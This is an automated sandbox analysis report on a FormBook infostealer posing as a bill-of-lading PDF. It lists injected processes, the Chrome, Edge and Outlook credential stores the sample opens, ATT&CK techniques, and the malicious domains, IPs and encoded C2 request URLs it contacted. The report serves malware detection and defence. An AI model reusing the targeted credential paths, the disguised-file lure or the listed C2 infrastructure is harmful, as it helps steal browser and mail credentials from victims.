            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Bill Of Lading_MEDUVB935991.pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: Bill Of Lading_MEDUVB935991.pdf.exeBinary or memory string: WIN_XP
            Source: Bill Of Lading_MEDUVB935991.pdf.exeBinary or memory string: WIN_XPe
            Source: Bill Of Lading_MEDUVB935991.pdf.exeBinary or memory string: WIN_VISTA
            Source: Bill Of Lading_MEDUVB935991.pdf.exeBinary or memory string: WIN_7

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		13
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH2
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		1
            Masquerading            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Valid Accounts            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Virtualization/Sandbox Evasion            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540748 Sample: Bill Of Lading_MEDUVB935991... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 28 www.ly0.xyz 2->28 30 www.academyinmotion.xyz 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 8 other signatures 2->50 10 Bill Of Lading_MEDUVB935991.pdf.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 gNKNuXuipEBZec.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 write.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 gNKNuXuipEBZec.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 mjcregionsud.org 91.212.26.5, 50019, 50020, 50021 WEBINDUSTRIEFR France 22->34 36 www.numbox.live 63.250.47.57, 50031, 50032, 50033 NAMECHEAP-NETUS United States 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Bill Of Lading_MEDUVB935991.pdf.exe55%ReversingLabsWin32.Trojan.AutoitInject
            Bill Of Lading_MEDUVB935991.pdf.exe56%VirustotalBrowse
            Bill Of Lading_MEDUVB935991.pdf.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            d81dp.top0%VirustotalBrowse
            myrideguy.net0%VirustotalBrowse
            academyinmotion.xyz1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            d81dp.top
            		154.23.184.194
            		truetrueunknown
            myrideguy.net
            		68.66.226.116
            		truetrueunknown
            academyinmotion.xyz
            		3.33.130.190
            		truetrueunknown
            www.awesomearv.buzz
            		161.97.168.245
            		truetrue
              		unknown
              huayang.302.gn301.xyz
              		107.148.177.200
              		truetrue
                		unknown
                allinathletes.biz
                		3.33.130.190
                		truetrue
                  		unknown
                  www.heeraka.info
                  		75.2.103.23
                  		truetrue
                    		unknown
                    levelsabovetravel.info
                    		3.33.130.190
                    		truetrue
                      		unknown
                      www.numbox.live
                      		63.250.47.57
                      		truetrue
                        		unknown
                        barbequecritics.com
                        		3.33.130.190
                        		truetrue
                          		unknown
                          www.ly0.xyz
                          		104.21.78.104
                          		truetrue
                            		unknown
                            mjcregionsud.org
                            		91.212.26.5
                            		truetrue
                              		unknown
                              030002252.xyz
                              		65.21.196.90
                              		truetrue
                                		unknown
                                www.lunch.delivery
                                		13.248.169.48
                                		truetrue
                                  		unknown
                                  www.academyinmotion.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.allinathletes.biz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.d81dp.top
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.barbequecritics.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.myrideguy.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.60881.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.030002252.xyz
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.levelsabovetravel.info
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.mjcregionsud.org
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.levelsabovetravel.info/kbee/true
                                                      		unknown
                                                      http://www.barbequecritics.com/el3s/?Qzj=6Ta3dC1SbFexLGaAyK/XrrF8DJnhB8YLWm/0OzXEbXNGBqYW7sBnSGIWAqT2FNWebLiZ+YaCaloaRZMkiWHL3ouL7ZTQk1OjsJsHDhDi+W4oi2FDqh4Gk0M=&Znyl=2rnxDBtrue
                                                        		unknown
                                                        http://www.60881.xyz/ynjl/?Qzj=PEs7u0VzI3DSA9TKYNWnz6gyWb/C39oE0a50vjpoFb3NQEkD5EPR31gJ3YEDEVY88OmbAto+098c/gTiopGLABAEMyjtpbfsUvV6UeXcuCjdlGHHhk6aRcY=&Znyl=2rnxDBtrue
                                                          		unknown
                                                          http://www.allinathletes.biz/te6q/true
                                                            		unknown
                                                            http://www.awesomearv.buzz/53bw/?Znyl=2rnxDB&Qzj=y602DfOxy8k4aDGeL32BfjMr8rtJj4VEvf5zKPNxBw/5ZQtnSgrsDIShG/LT94BV3SRTeLh29bGmgRGfpvfkbNV5yHp9DO9ljl/7OAHX9kTVnWn3IiM7pPI=true
                                                              		unknown
                                                              http://www.mjcregionsud.org/r61b/?Qzj=3quBh4mzL0lL+B9uaAFlB72ZycJbxnt6GENoLoKygJVSWFdT0X7NdoQT/6uiE3Ni1BD7Zx2rh99upTwYdPvuDtoYAZVOuycnaW3rI/gIwuhnX/+XN/+iqEA=&Znyl=2rnxDBtrue
                                                                		unknown
                                                                http://www.myrideguy.net/kgyd/true
                                                                  		unknown
                                                                  http://www.heeraka.info/o7wc/true
                                                                    		unknown
                                                                    http://www.030002252.xyz/2ncs/?Qzj=C9x4nV75ALRtqPK+aAR0NWmp5g6EqVqabxnIo4b2Z27N+E0QPuJF7pA8iv4PlagxECtfepEWwKhTDmrEQ68cs056FDzHHej7JHydzS2yCPPgbwEKPk9K7sk=&Znyl=2rnxDBtrue
                                                                      		unknown
                                                                      http://www.myrideguy.net/kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc=true
                                                                        		unknown
                                                                        http://www.numbox.live/q7ah/true
                                                                          		unknown
                                                                          http://www.lunch.delivery/qwed/true
                                                                            		unknown
                                                                            http://www.60881.xyz/ynjl/true
                                                                              		unknown
                                                                              http://www.d81dp.top/9m01/true
                                                                                		unknown
                                                                                http://www.numbox.live/q7ah/?Qzj=yQb1MnoYePGa+D7HYWwXgG+nDQu6P4qgSNNB5eb+vdtsin1jnkdmikqCDVoWxFHrVuMckJ02SL88S12T7EptmvXNk3VDSDUHyMzwNFIiRJYEDhiEAb6niHg=&Znyl=2rnxDBtrue
                                                                                  		unknown
                                                                                  http://www.levelsabovetravel.info/kbee/?Qzj=DCgTIaYcg8rLkvez6aURNH1rI8GLniCnkbIF1Zor3lwvkrlOJ/rxEwh4juCbWbA1v3jo2CjSkAc6+9U16ObyIJEVbwGNWxBZ4iE6d4sVGLDCvtPxuAtI0Gg=&Znyl=2rnxDBtrue
                                                                                    		unknown
                                                                                    http://www.barbequecritics.com/el3s/true
                                                                                      		unknown
                                                                                      http://www.allinathletes.biz/te6q/?Qzj=Bi48EnnHLnucFoFteZ9CbIdOGuitqrUowmdcea1K+IX7Dd8zgRCPoEq+V26bo8zYK23oBEB5tVQZMZR237sZHxvwddrlAP0HIvOhneqwjksiJ5dMJ78gJU0=&Znyl=2rnxDBtrue
                                                                                        		unknown
                                                                                        http://www.ly0.xyz/vshw/?Qzj=EspU2mytRZKz4auAzVKL1tfZdJmh9evbelDltaue1VIW4sYIVCILyk3Sg5ScN2hRjv7eCPLeVYxJkFe87LUrFuvYQ7vdzmgwzIu85Xz/vDtptw9jh7A1S+4=&Znyl=2rnxDBtrue
                                                                                          		unknown
                                                                                          http://www.awesomearv.buzz/53bw/true
                                                                                            		unknown
                                                                                            http://www.mjcregionsud.org/r61b/true
                                                                                              		unknown
                                                                                              http://www.d81dp.top/9m01/?Qzj=YTEnPXeuvLCqp8pRYoqPCdBwzXmtEoIu3aiFszfHZiHCethv0UoX0rXDgO0m0L5Zay3qgh7+EeCD2cfEa0kxYtbLgo4/0RqeWSM2Ph2v0Riv4xOBN3dU33Q=&Znyl=2rnxDBtrue
                                                                                                		unknown
                                                                                                http://www.ly0.xyz/vshw/true
                                                                                                  		unknown
                                                                                                  http://www.030002252.xyz/2ncs/true
                                                                                                    		unknown
                                                                                                    http://www.heeraka.info/o7wc/?Qzj=noDrsAMitbMGukbGKwTOr3sYcBr23H5ivpvnAiMvw1nUlPzFIxH7oxZbrZBuy0eo4pgag2ycYt5GuEsaJdfqIMS3tV1Dx9iQIhSiX0wNT38Z12lUBSmDrQk=&Znyl=2rnxDBtrue
                                                                                                      		unknown
                                                                                                      http://www.academyinmotion.xyz/63ck/?Znyl=2rnxDB&Qzj=GQYraOg50FzHvWxTy9J2g/Ct8yJZYLUl1pszYO6BquwY8zCRfPuOPPLv6opwWQ+1qa0YVJN1ZlZd4AL6pjVc8tqy3KaAjtZyQfx4UTLqHu607EYV+xyRwE8=true
                                                                                                        		unknown

                                                                                                        URLs from Memory and Binaries

                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                        https://duckduckgo.com/chrome_newtabwrite.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://duckduckgo.com/ac/?q=write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icowrite.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://http.gn301.com:12345/?u=write.exe, 00000006.00000002.4199021096.000000000555C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.00000000036EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.barbequecritics.comgNKNuXuipEBZec.exe, 00000007.00000002.4200186991.000000000517C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.ecosia.org/newtab/write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://myrideguy.net/kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vAwrite.exe, 00000006.00000002.4199021096.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000004058000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://ac.ecosia.org/autocomplete?q=write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.dzyngiri.comwrite.exe, 00000006.00000002.4199021096.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwrite.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://justinmezzell.comwrite.exe, 00000006.00000002.4199021096.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    75.2.103.23
                                                                                                                    		www.heeraka.infoUnited States
                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                    13.248.169.48
                                                                                                                    		www.lunch.deliveryUnited States
                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                    65.21.196.90
                                                                                                                    		030002252.xyzUnited States
                                                                                                                    		199592CP-ASDEtrue
                                                                                                                    91.212.26.5
                                                                                                                    		mjcregionsud.orgFrance
                                                                                                                    		47891WEBINDUSTRIEFRtrue
                                                                                                                    107.148.177.200
                                                                                                                    		huayang.302.gn301.xyzUnited States
                                                                                                                    		18013ASLINE-AS-APASLINELIMITEDHKtrue
                                                                                                                    154.23.184.194
                                                                                                                    		d81dp.topUnited States
                                                                                                                    		174COGENT-174UStrue
                                                                                                                    104.21.78.104
                                                                                                                    		www.ly0.xyzUnited States
                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                    63.250.47.57
                                                                                                                    		www.numbox.liveUnited States
                                                                                                                    		22612NAMECHEAP-NETUStrue
                                                                                                                    3.33.130.190
                                                                                                                    		academyinmotion.xyzUnited States
                                                                                                                    		8987AMAZONEXPANSIONGBtrue
                                                                                                                    161.97.168.245
                                                                                                                    		www.awesomearv.buzzUnited States
                                                                                                                    		51167CONTABODEtrue
                                                                                                                    68.66.226.116
                                                                                                                    		myrideguy.netUnited States
                                                                                                                    		55293A2HOSTINGUStrue

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1540748
                                                                                                                    Start date and time:2024-10-24 05:05:08 +02:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 10m 40s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:8
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:2
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:Bill Of Lading_MEDUVB935991.pdf.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@14/11
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 75%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 98%
                                                                                                                    • Number of executed functions: 39
                                                                                                                    • Number of non-executed functions: 320
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target gNKNuXuipEBZec.exe, PID 4624 because it is empty
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    23:07:28API Interceptor10363784x Sleep call for process: write.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    75.2.103.23rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.webeuz.buzz/pw0n/
                                                                                                                    quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.webeuz.buzz/pw0n/
                                                                                                                    AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.heeraka.info/o7wc/
                                                                                                                    PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.webeuz.buzz/okq4/
                                                                                                                    13.248.169.48FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • www.how2.guru/7eim/
                                                                                                                    General terms and conditions of sale - Valid from 10202024 to 12312024.exeGet hashmaliciousFormBookBrowse
